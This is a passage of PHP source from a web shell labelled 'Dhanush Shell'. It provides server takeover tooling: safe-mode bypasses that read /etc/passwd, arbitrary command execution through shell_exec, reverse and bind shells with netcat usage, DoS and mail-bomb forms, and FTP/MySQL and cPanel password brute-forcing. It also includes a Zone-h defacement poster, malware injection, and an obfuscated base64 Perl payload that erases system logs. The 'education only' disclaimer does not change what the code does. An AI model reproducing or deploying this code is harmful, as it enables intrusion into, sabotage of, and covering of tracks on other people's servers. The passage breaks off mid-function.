4872 <input type="text" name="filecontents" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('filecontents',filecontents.value)" value="bypass" class="but">
4873 </form>
4874 </td>
4875 </tr>
4876
4877 <tr>
4878 <td align="center">
4879 <p>Using Stream contents function</p>
4880 <form onSubmit="bypassfun('stream',stream.value);return false;">
4881 <input type="text" name="stream" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('stream',stream.value)" value="bypass" class="but">
4882 </form>
4883 </td>
4884 <td align="center">
4885 <p>Using Curl() function</p>
4886 <form onSubmit="bypassfun('curl',curl.value);return false;">
4887 <input type="text" name="curl" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',curl.value)" value="bypass" class="but">
4888 </form>
4889 </td>
4890 </tr>
4891
4892 <tr>
4893 <td align="center">
4894 <p>Bypass using include()</p>
4895 <form onSubmit="bypassfun('include',include.value);return false;">
4896 <input type="text" name="include" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('include',include.value)" value="bypass" class="but">
4897 </form>
4898 </td>
4899 <td align="center">
4900 <p>Using id() function</p>
4901 <form onSubmit="bypassfun('id',id.value);return false;">
4902 <input type="text" name="id" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.value)" value="bypass" class="but">
4903 </form>
4904 </td>
4905 </tr>
4906
4907 <tr>
4908 <td align="center">
4909 <p>Using tempnam() function</p>
4910 <form onSubmit="bypassfun('tempnam',tempname.value);return false;">
4911 <input type="text" name="tempname" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('tempnam',tempname.value)" value="bypass" class="but">
4912 </form>
4913 </td>
4914 <td align="center">
4915 <p>Using symlink() function</p>
4916 <form onSubmit="bypassfun('symlnk',sym.value);return false;">
4917 <input type="text" name="sym" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('symlnk',sym.value)" value="bypass" class="but">
4918 </form>
4919 </td>
4920 </tr>
4921 <tr>
4922 <td colspan=2 align="center">
4923 <p>Using Bypass function</p>
4924 <form onSubmit="bypassfun('newtype',newtype.value,optiontype.value);return false;">
4925 <input type="text" name="newtype" value="/etc/passwd" class="sbox">
4926 <select id="optiontype" class=sbox>
4927 <option value="tac">tac</option>
4928 <option value="more">more</option>
4929 <option value="less">less</option>
4930 <option value="rev">rev</option>
4931 <option value="xxd">xxd</option>
4932 <option value="awk">awk</option>
4933 </select>
4934 <input type="button" OnClick="bypassfun('newtype',newtype.value,optiontype.value)" value="bypass" class="but">
4935 </form>
4936 </td>
4937
4938 </tr>
4939 </table>
4940 </form>
4941 <?php
4942}
4943//fuzzer
4944else if(isset($_GET['fuzz']))
4945{
4946 ?>
4947 <form method="GET">
4948 <table id="margins">
4949 <tr>
4950 <td width="400" class="title">
4951 IP
4952 </td>
4953 <td>
4954 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
4955 </td>
4956 </tr>
4957
4958 <tr>
4959 <td class="title">
4960 Port
4961 </td>
4962 <td>
4963 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
4964 </td>
4965 </tr>
4966
4967 <tr>
4968 <td class="title">
4969 Timeout
4970 </td>
4971 <td>
4972 <input type="text" class="box" name="time" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';"/>
4973 </td>
4974 </tr>
4975
4976
4977 <tr>
4978 <td class="title">
4979 No of times
4980 </td>
4981 <td>
4982 <input type="text" class="box" name="times" value="100" onFocus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.value='100';" />
4983 </td>
4984 </tr>
4985
4986 <tr>
4987 <td class="title">
4988 Message (The message Should be long and it will be multiplied with the value after it)
4989 </td>
4990 <td>
4991 <input class="box" name="message" value="%S%x--Some Garbage here --%x%S" onFocus="if(this.value == '%S%x--Some Garbage here --%x%S')this.value = '';" onBlur="if(this.value=='')this.value='%S%x--Some Garbage here --%x%S';"/>
4992 </td>
4993 <td>
4994 x
4995 </td>
4996 <td width="20">
4997 <input style="width: 30px;" class="box" name="messageMultiplier" value="10" />
4998 </td>
4999 </tr>
5000
5001 <tr>
5002 <td rowspan="2">
5003 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('fuzzer',myip.value,port.value,time.value,times.value,message.value,messageMultiplier.value)" class="but" value=" Submit "/>
5004 </td>
5005 </tr>
5006 </table>
5007 </form><div id="showdos"></div>
5008 <?php
5009}
5010// Zone-h Poster
5011 else if(isset($_GET["zone"]))
5012 {
5013 if(!function_exists('curl_version'))
5014 {
5015 echo "<pre style='margin-top:5px'><center><font >PHP CURL NOT EXIST</font></center></pre>";
5016 }
5017 ?>
5018 <center><font size="4">Zone-h Poster</font></center>
5019 <form action="<?php echo $self; ?>" method="post">
5020 <table align="center" cellpadding="5" border="0">
5021 <tr>
5022 <td>
5023 <input type="text" name="defacer" value="Attacker" class="box" /></td></tr>
5024 <tr><td>
5025 <select name="hackmode" class="box">
5026 <option >--------SELECT--------</option>
5027 <option value="1">known vulnerability (i.e. unpatched system)</option>
5028 <option value="2" >undisclosed (new) vulnerability</option>
5029 <option value="3" >configuration / admin. mistake</option>
5030 <option value="4" >brute force attack</option>
5031 <option value="5" >social engineering</option>
5032 <option value="6" >Web Server intrusion</option>
5033 <option value="7" >Web Server external module intrusion</option>
5034 <option value="8" >Mail Server intrusion</option>
5035 <option value="9" >FTP Server intrusion</option>
5036 <option value="10" >SSH Server intrusion</option>
5037 <option value="11" >Telnet Server intrusion</option>
5038 <option value="12" >RPC Server intrusion</option>
5039 <option value="13" >Shares misconfiguration</option>
5040 <option value="14" >Other Server intrusion</option>
5041 <option value="15" >SQL Injection</option>
5042 <option value="16" >URL Poisoning</option>
5043 <option value="17" >File Inclusion</option>
5044 <option value="18" >Other Web Application bug</option>
5045 <option value="19" >Remote administrative panel access bruteforcing</option>
5046 <option value="20" >Remote administrative panel access password guessing</option>
5047 <option value="21" >Remote administrative panel access social engineering</option>
5048 <option value="22" >Attack against administrator(password stealing/sniffing)</option>
5049 <option value="23" >Access credentials through Man In the Middle attack</option>
5050 <option value="24" >Remote service password guessing</option>
5051 <option value="25" >Remote service password bruteforce</option>
5052 <option value="26" >Rerouting after attacking the Firewall</option>
5053 <option value="27" >Rerouting after attacking the Router</option>
5054 <option value="28" >DNS attack through social engineering</option>
5055 <option value="29" >DNS attack through cache poisoning</option>
5056 <option value="30" >Not available</option>
5057 </select>
5058 </td></tr>
5059 <tr><td>
5060 <select name="reason" class="box">
5061 <option >--------SELECT--------</option>
5062 <option value="1" >Heh...just for fun!</option>
5063 <option value="2" >Revenge against that website</option>
5064 <option value="3" >Political reasons</option>
5065 <option value="4" >As a challenge</option>
5066 <option value="5" >I just want to be the best defacer</option>
5067 <option value="6" >Patriotism</option>
5068 <option value="7" >Not available</option>
5069 </select></td></tr>
5070 <tr><td>
5071 <textarea name="domain" class="box" cols="47" rows="9">List Of Domains</textarea></td></tr>
5072 <tr><td>
5073 <input type="button" onClick="zoneh(defacer.value,hackmode.value,reason.value,domain.value)" class="but" value="Send Now !" /></td></tr></table>
5074 </form><div id="showzone"></div>
5075 <?php }
5076//DDos
5077 else if(isset($_GET['dos']))
5078 {
5079 ?>
5080 <form method="GET">
5081 <table id="margins">
5082 <tr>
5083 <td width="400" class="title">
5084 IP
5085 </td>
5086 <td>
5087 <input class="box" name="myip" value="127.0.0.1" onFocus="if(this.value == '127.0.0.1')this.value = '';" onBlur="if(this.value=='')this.value='127.0.0.1';"/>
5088 </td>
5089 </tr>
5090
5091 <tr>
5092 <td class="title">
5093 Port
5094 </td>
5095 <td>
5096 <input class="box" name="port" value="80" onFocus="if(this.value == '80')this.value = '';" onBlur="if(this.value=='')this.value='80';"/>
5097 </td>
5098 </tr>
5099
5100 <tr>
5101 <td class="title">
5102 Timeout <font >(Time in seconds)</font>
5103 </td>
5104 <td>
5105 <input type="text" class="box" name="timeout" value="5" onFocus="if(this.value == '5')this.value = '';" onBlur="if(this.value=='')this.value='5';" />
5106 </td>
5107 </tr>
5108 <tr>
5109 <td class="title">
5110 Execution Time <font >(Time in seconds)</font>
5111 </td>
5112 <td>
5113 <input type="text" class="box" name="exTime" value="10" onFocus="if(this.value == '10')this.value = '';" onBlur="if(this.value=='')this.value='10';"/>
5114 </td>
5115 </tr>
5116 <tr>
5117 <td class="title">
5118 No of Bytes per/packet
5119 </td>
5120 <td>
5121 <input type="text" class="box" name="noOfBytes" value="999999" onFocus="if(this.value == '999999')this.value = '';" onBlur="if(this.value=='')this.value='999999';"/>
5122 </td>
5123 </tr>
5124 <tr>
5125 <td rowspan="2">
5126 <input style="margin : 20px; margin-left: 500px; padding : 10px; width: 100px;" type="button" onClick="dos('dosser',myip.value,port.value,timeout.value,exTime.value,noOfBytes.value,'null')" class="but" value=" Attack >> "/>
5127 </td>
5128 </tr>
5129 </table>
5130 </form><div id="showdos"></div>
5131 <?php
5132}
5133else if(isset($_GET['mailbomb']))
5134{ ?>
5135 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('bomb')"><font class=txt size="4">| Mail Bomber |</font></a></td>
5136 <td><a href=javascript:void(0) onClick="getdata('mail')"><font class=txt size="4">| Mass Mailer |</font></a></td></tr></table></center><br><div id=showdata></div>
5137<?php
5138}
5139else if(isset($_GET['tools']))
5140 {
5141 ?>
5142 <center><br><form onSubmit="getport(host.value,protocol.value);return false;">
5143 <table cellpadding="5" border="3" style="border-color:#333333; width:50%;">
5144 <tr>
5145 <td colspan="2" align="center"><b><font size='4'>Port Scanner<br></font></b></td>
5146 </tr>
5147 <tr>
5148 <td align="center">
5149 <input class="sbox" type='text' name='host' value='<?php echo $_SERVER["SERVER_ADDR"]; ?>' >
5150 </td>
5151 <td align="center">
5152 <select class="sbox" name='protocol'>
5153 <option value='tcp'>tcp</option>
5154 <option value='udp'>udp</option>
5155 </select>
5156 </td>
5157 <tr>
5158 <td colspan="2" align="center"><input class="but" type='button' onClick="getport(host.value,protocol.value)" value='Scan Ports'></td>
5159 </tr>
5160 </form>
5161 <tr><td colspan=2><div id="showports"></div>
5162 </td></tr></table>
5163
5164 <br>
5165 <form onSubmit="bruteforce(prototype.value,serverport.value,login.value,dict.value);return false;">
5166 <table cellpadding="5" border="2" style="border-color:#333333; width:50%;">
5167 <tr>
5168 <td colspan="2" align="center"><font size="4">BruteForce</font></td>
5169 </tr>
5170 <tr>
5171 <td>Type : </td>
5172 <td>
5173 <select name="prototype" class="sbox">
5174 <option value="ftp">FTP</option>
5175 <option value="mysql">MYSQL</option>
5176 <option value="postgresql">PostgreSql</option>
5177 </select>
5178 </td>
5179 </tr>
5180 <tr>
5181 <td>Server <b>:</b> Port : </td>
5182 <td><input type="text" name="serverport" value="<?php echo $_SERVER["SERVER_ADDR"]; ?>" class="sbox"></td>
5183 </tr>
5184 <tr>
5185 <td valign="middle">Brute type : </td>
5186 <td><label><input type=radio name=mytype value="1" checked> /etc/passwd</label><label><input type=checkbox id="reverse" name=reverse value=1 checked> reverse (login -> nigol)</label><hr color="#1B1B1B">
5187 <label><input type=radio name=mytype value="2"> Dictionary</label><br>
5188 Login : <input type="text" name="login" value="root" class="sbox"><br>
5189 Dictionary : <input type="text" name="dict" value="<?php echo getcwd() . $directorysperator; ?>passwd.txt" class="sbox">
5190 </td>
5191 </tr>
5192 <tr>
5193 <td colspan="2" align="center"><input type="button" onClick="bruteforce(prototype.value,serverport.value,login.value,dict.value)" value="Attack >>" class="but"></td>
5194 </tr>
5195 </form><tr><td colspan="2" id="showbrute"></td></tr>
5196 </table>
5197 </center><br>
5198 <?php
5199}
5200else if (isset($_GET["phpc"]))
5201{
5202 ?>
5203 <div id="showresult"></div>
5204 <form name="frm">
5205 <textarea name="code" class="box" cols="120" rows="10">phpinfo();</textarea>
5206 <br /><br />
5207 <input name="submit" value="Execute This COde! " class="but" onClick="execode(code.value)" type="button" />
5208 <label><input type="checkbox" id="intext" name="intext" value="disp"> <font class=txt size="3">Display in Textarea</font></label>
5209 </form>
5210 <?php
5211}
5212else if(isset($_GET["exploit"]))
5213{
5214 if(!isset($_GET["rootexploit"]))
5215 {
5216 ?>
5217 <center>
5218 <form action="<?php echo $self; ?>" method="get" target="_blank">
5219 <input type="hidden" name="exploit">
5220 <table border="1" cellpadding="5" cellspacing="4" style="width:50%;border-color:#333333;">
5221 <tr>
5222 <td style="height:60px;">
5223 <font size="4" class=txt>Select Website</font></td><td>
5224 <p><select id="rootexploit" name="rootexploit" class="box">
5225 <option value="exploit-db">Exploit-db</option>
5226 <option value="packetstormsecurity">Packetstormsecurity</option>
5227 <option value="exploitsearch">Exploitsearch</option>
5228 <option value="shodanhq">Shodanhq</option>
5229 </select></p></td></tr><tr><td colspan="2" align="center" style="height:40px;">
5230 <input type="submit" value="Search" class="but"></td></tr></table>
5231 </form></center><br>
5232
5233 <?php
5234 }
5235 else
5236 {
5237 //exploit search
5238 $Lversion = php_uname(r);
5239 $OSV = php_uname(s);
5240 if(eregi('Linux',$OSV))
5241 {
5242 $Lversion=substr($Lversion,0,6);
5243 if($_GET['rootexploit'] == "exploit-db")
5244 {
5245 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$Lversion&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5246 }
5247 else if($_GET['rootexploit'] == "packetstormsecurity")
5248 {
5249 header("Location:http://www.packetstormsecurity.org/search/?q=Linux+Kernel+$Lversion");
5250 }
5251 else if($_GET['rootexploit'] == "exploitsearch")
5252 {
5253 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=Linux+Kernel+$Lversion");
5254 }
5255 else if($_GET['rootexploit'] == "shodanhq")
5256 {
5257 header("Location:https://exploits.shodan.io/?q=$Lversion+platform:\"linux\"");
5258 }
5259 }
5260 else
5261 {
5262 $Lversion=substr($Lversion,0,3);
5263 if($_GET['rootexploit'] == "exploit-db")
5264 {
5265 header("Location:http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=$OSV&filter_exploit_text=&filter_author=&filter_platform=16&filter_type=2&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve=");
5266 }
5267 else if($_GET['rootexploit'] == "packetstormsecurity")
5268 {
5269 header("Location:http://www.packetstormsecurity.org/search/?q=$OSV+Lversion");
5270 }
5271 else if($_GET['rootexploit'] == "exploitsearch")
5272 {
5273 header("Location:http://exploitsearch.com/search.html?cx=000255850439926950150%3A_vswux9nmz0&cof=FORID%3A10&q=$OSV+Lversion");
5274 }
5275 else if($_GET['rootexploit'] == "shodanhq")
5276 {
5277 header("Location:https://exploits.shodan.io/?q=$OSV+platform:\"windows\"");
5278 }
5279 }
5280 //End of Exploit search
5281 }
5282}
5283// Connect
5284else if(isset($_REQUEST['connect']))
5285{
5286 ?>
5287 <form action='<?php echo $self; ?>' method='POST' >
5288 <table style="width:50%" align="center" >
5289 <tr>
5290 <th colspan="1" width="50px">Reverse Shell</th>
5291 <th colspan="1" width="50px">Bind Shell</th>
5292 </tr>
5293 <tr>
5294 <td>
5295 <table style="border-spacing: 6px;">
5296 <tr>
5297 <td>IP </td>
5298 <td>
5299 <input type="text" class="box" style="width: 200px;" name="ip" value="<?php yourip();?>" />
5300 </td>
5301 </tr>
5302 <tr>
5303 <td>Port </td>
5304 <td><input style="width: 200px;" class="box" name="port" size='5' value="9891"/></td>
5305 </tr>
5306 <tr>
5307 <td style="vertical-align:top;">Use:</td>
5308 <td><select style="width: 95px;" name="lang" class="sbox">
5309 <option value="perl">Perl</option>
5310 <option value="python">Python</option>
5311 <option value="php">PHP</option>
5312 </select>
5313 <input type="submit" style="width: 90px;" class="but" value="Connect!" name="backconnect"/></td>
5314 </tr>
5315 </table> </form>
5316 </td>
5317
5318 <td style="vertical-align:top;">
5319 <form method='post' >
5320 <table style="border-spacing: 6px;">
5321 <tr>
5322 <td>Port</td>
5323 <td>
5324 <input style="width: 200px;" class="box" name="port" value="9891" />
5325 </td>
5326 </tr>
5327 <tr>
5328 <td>Password </td>
5329 <td>
5330 <input style="width: 200px;" class="box" name="passwd" value="Dhanush"/>
5331 </td>
5332 <tr>
5333 <td>Using</td>
5334 <td>
5335 <select style="width: 95px;" name="lang" id="lang" class="sbox">
5336 <option value="perl">Perl</option>
5337 <option value="c">C</option>
5338 </select>
5339 <input style="width: 90px;" class="but" type="submit" name="backdoor" value=" Bind "/></td>
5340 </tr>
5341 </table>
5342 </td>
5343 </form>
5344 </tr>
5345 <tr><td colspan=2>Click "Connect" only after open port for it.Use NetCat, run "nc -l -n -v -p 9891"!<br>Click "Bind", use netcat and give it the command 'nc <?php yourip(); ?> 9891"!</td></tr>
5346 </table>
5347
5348 <?php
5349 }
5350else if(isset($_REQUEST['subdomain']))
5351{
5352 ?>
5353 <center><form>
5354 <table>
5355 <tr>
5356 <td>Cpanel user : </td>
5357 <td><input type="text" name="cpaneluser" value="<?php echo get_current_user(); ?>" class="box" /></td>
5358 </tr>
5359 <tr>
5360 <td>Cpanel password : </td>
5361 <td><input type="password" name="cpanelpass" class="box" /></td>
5362 </tr>
5363 <tr>
5364 <td>Number of Subdomain : </td>
5365 <td><input type="text" name="noofsubdomain" class="box" value="10" /></td>
5366 </tr>
5367 <tr>
5368 <td valign="top">Index : </td>
5369 <td><textarea rows="7" cols="54" name="subindex" class="box">You just got Hacked</textarea></td>
5370 </tr>
5371 <tr>
5372 <td></td>
5373 <td><input type="button" value=" go " class="but" onClick="createsubdomain(cpaneluser.value,cpanelpass.value,noofsubdomain.value,subindex.value)" /></td>
5374 </tr>
5375 </table></center></form><br>
5376 <div id="showmydata"></div>
5377 <?php
5378}
5379else if(isset($_REQUEST['404']))
5380{
5381 ?>
5382 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('404new')"><font class=txt size="4">| Set Your 404 Page |</font></a></td>
5383 <td><a href=javascript:void(0) onClick="getdata('404page')"><font class=txt size="4">| Set Specified 404 Page |</font></a></td>
5384 </tr></table></center><br>
5385 <div id="showdata"></div>
5386 <?php
5387}
5388else if(isset($_GET['about']))
5389 { ?>
5390 <center>
5391 <p><font size=6><u>D h a n u s h</u></font><br>
5392 <font size=5>[--==Coded By Arjun==--]</font>
5393 <div style='font-family: Courier New; font-size: 10px;'><font class=om><pre>
5394
5395 - -- -
5396 -- -- --
5397 -- --
5398 --- ---
5399 ------
5400 ----
5401 ----
5402 ------
5403-------
5404--- --
5405 -- ---
5406 -- -----
5407 --- --- ---
5408 --- --- ---
5409-- --------- --
5410-- ------- --
5411 -- ---- --
5412 -- --- --
5413 -- -- --
5414 --- --- -- ---
5415 ------ ------
5416 ---- ----
5417
5418
5419 </pre></font></div></center>
5420 <font class="om">Dhanush Shell is a PHP Script, created for checking the vulnerability and security of any web server or website. With this PHP script, the owner can check various vulnerablities present in the web server. This shell provide you almost every facility that the security analyst need for penetration testing. This is a "All In One" php script, so that the user do not need to go anywhere else.<br> This script is coded by an Indian Ethical Hacker.<br> This script is only coded for education purpose or testing on your own server. The developer of the script is not responsible for any damage or misuse of it.</font><br><br><center><font size=5>GREETZ To All Indian Hackers</font><br><font size=6>| जय महाकाल | | जय हिन्द |</font></center><br>
5421 <?php }
5422else if(isset($_GET['database']))
5423{ ?>
5424 <form onSubmit="mydatabase(server.value,username.value,password.value);return false;">
5425 <table id="datatable" style="width:90%;" cellpadding="4" align="center">
5426 <tr>
5427 <td colspan="2">Connect To Database</td>
5428 </tr>
5429 <tr>
5430 <td>Server Address :</td>
5431 <td><input type="text" class="box" name="server" value="localhost"></td>
5432 </tr>
5433 <tr>
5434 <td>Username :</td>
5435 <td><input type="text" class="box" name="username" value="root"></td>
5436 </tr>
5437 <tr>
5438 <td>Password:</td>
5439 <td><input type="text" class="box" name="password" value=""></td>
5440 </tr>
5441
5442 <tr>
5443 <td></td>
5444 <td><input type="button" onClick="mydatabase(server.value,username.value,password.value)" value=" Connect " name="executeit" class="but"></td>
5445 </tr>
5446 </table>
5447 </form>
5448 <div id="showsql"></div>
5449<?php
5450}
5451// Cpanel Cracker
5452 else if(isset($_REQUEST['cpanel']))
5453 {
5454 $cpanel_port="2082";
5455 $connect_timeout=5;
5456 ?>
5457 <center>
5458 <form method=post>
5459 <table class="btmtbl" style="width:50%;" border=1 cellpadding=4>
5460 <tr>
5461 <td align=center>User names</td><td align=center>Password</td>
5462 </tr>
5463 <tr>
5464 <td align=center><textarea name=username rows=25 cols=22 class=box><?php
5465 if($os != "Windows")
5466 {
5467 if(@file('/etc/passwd'))
5468 {
5469 $users = file('/etc/passwd');
5470 foreach($users as $user)
5471 {
5472 $user = explode(':', $user);
5473 echo $user[0] . "\n";
5474 }
5475 }
5476 else
5477 {
5478 $temp = "";
5479 $val1 = 0;
5480 $val2 = 1000;
5481 for(;$val1 <= $val2;$val1++)
5482 {
5483 $uid = @posix_getpwuid($val1);
5484 if ($uid)
5485 $temp .= join(':',$uid)."\n";
5486 }
5487
5488 $temp = trim($temp);
5489
5490 if($file5 = fopen("test.txt","w"))
5491 {
5492 fputs($file5,$temp);
5493 fclose($file5);
5494
5495 $file = fopen("test.txt", "r");
5496 while(!feof($file))
5497 {
5498 $s = fgets($file);
5499 $matches = array();
5500 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
5501 $matches = str_replace("home/","",$matches[1]);
5502 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
5503 continue;
5504 echo $matches;
5505 }
5506 fclose($file);
5507 }
5508 }
5509 }
5510
5511 ?></textarea></td><td align=center><textarea name=password rows=25 cols=22 class=box></textarea></td>
5512 </tr>
5513 <tr>
5514 <td align=center colspan=2><input type="submit" name="cpanelattack" value=" Go " class=but></td>
5515 </tr>
5516 </table>
5517 </form>
5518 </center>
5519 <?php
5520}
5521else if(isset($_REQUEST['malattack']))
5522{
5523 ?><input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
5524 <center><table><tr><td><a href=# onClick="getdata('malware')"><font class=txt size="4">| Malware Attack |</font></a></td>
5525 <td><a href=# onClick="getdata('codeinsert')"><font class=txt size="4">| Insert Own Code |</font></a></td></tr></table></center><br>
5526 <div id="showdata"></div>
5527 <?php
5528}
5529else if(isset($_GET["com"]))
5530{
5531 echo "<br>";
5532 ob_start();
5533 eval("phpinfo();");
5534 $b = ob_get_contents();
5535 ob_end_clean();
5536 $a = strpos($b,"<body>")+6; // yeah baby,, your body is wonderland ;-)
5537 $z = strpos($b,"</body>");
5538 $s_result = "<div class='myphp'>".substr($b,$a,$z-$a)."</div>";
5539 echo $s_result;
5540}
5541else if(isset($_GET['execute']))
5542{
5543 $comm = $_GET['execute'];
5544 chdir($_GET['executepath']);
5545 $check = shell_exec($comm);
5546
5547 echo "<BR><center><textarea id=showexecute cols=100 rows=20 class=box>" . $check . "</textarea></center>";
5548
5549 ?>
5550 <BR><BR><center><form onSubmit="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value);return false;">
5551 <input type="text" class="box" name="execute">
5552 <input type="button" onClick="executemyfn('<?php echo addslashes($_GET['executepath']); ?>',execute.value)" value="Execute" class="but">
5553 <input type="button" onClick="cancel()" value="cancel" class="but" /></form></center><BR>
5554 <?php
5555}
5556else if(isset($_GET['mycmd']))
5557{
5558 if($_GET['mycmd']=="logeraser")
5559 {
5560 $erase = gzinflate(base64_decode("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"));
5561 if(is_writable("."))
5562 {
5563 if($openp = fopen(getcwd()."/logseraser.pl", 'w'))
5564 {
5565 fwrite($openp, $erase);
5566 fclose($openp);
5567 passthru("perl logseraser.pl linux");
5568 unlink("logseraser.pl");
5569 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5570 }
5571 } else
5572 {
5573 if($openp = fopen("/tmp/logseraser.pl", 'w'))
5574 {
5575 fwrite($openp, $erase)or die("Error");
5576 fclose($openp);
5577 $aidx = passthru("perl logseraser.pl linux");
5578 unlink("logseraser.pl");
5579 echo "<center><font color=#FFFFFF size=3>Logs Cleared</font></center>";
5580 }
5581 }
5582 }
5583 else
5584 {
5585 $check = shell_exec($_GET['mycmd']);
5586 echo "<center><textarea cols=120 rows=20 class=box>" . $check . "</textarea></center>";
5587
5588 }
5589}
5590else if(isset($_GET['prototype']))
5591{
5592 echo '<h1>Results</h1><div><span>Type:</span> '.htmlspecialchars($_GET['prototype']).' <span><br>Server:</span> '.htmlspecialchars($_GET['serverport']).'<br>';
5593 if( $_GET['prototype'] == 'ftp' )
5594 {
5595 function BruteFun($ip,$port,$login,$pass)
5596 {
5597 $fp = @ftp_connect($ip, $port?$port:21);
5598 if(!$fp) return false;
5599 $res = @ftp_login($fp, $login, $pass);
5600 @ftp_close($fp);
5601 return $res;
5602 }
5603 }
5604 elseif( $_GET['prototype'] == 'mysql' )
5605 {
5606 function BruteFun($ip,$port,$login,$pass)
5607 {
5608 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
5609 @mysql_close($res);
5610 return $res;
5611 }
5612 }
5613 elseif( $_GET['prototype'] == 'pgsql' )
5614 {
5615 function BruteFun($ip,$port,$login,$pass)
5616 {
